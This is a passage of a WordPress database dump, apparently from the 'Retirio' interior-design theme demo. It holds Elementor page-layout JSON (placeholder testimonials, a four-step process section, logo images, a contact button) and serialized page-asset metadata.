solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3312,4778,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3313,4778,'_elementor_pro_version','3.8.1'),(3314,4778,'_elementor_css','a:6:{s:4:\"time\";i:1685011836;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3315,4779,'_wp_page_template','elementor_header_footer'),(3316,4779,'_elementor_edit_mode','builder'),(3317,4779,'_elementor_template_type','wp-page'),(3318,4779,'_elementor_version','3.8.1'),(3319,4779,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom 